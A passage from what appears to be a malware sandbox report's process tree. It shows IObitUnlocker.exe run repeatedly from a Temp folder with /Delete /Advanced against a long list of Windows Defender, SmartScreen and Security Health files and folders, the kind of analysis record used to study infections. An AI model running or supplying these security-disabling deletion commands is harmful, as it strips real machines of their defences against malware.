Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1900
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
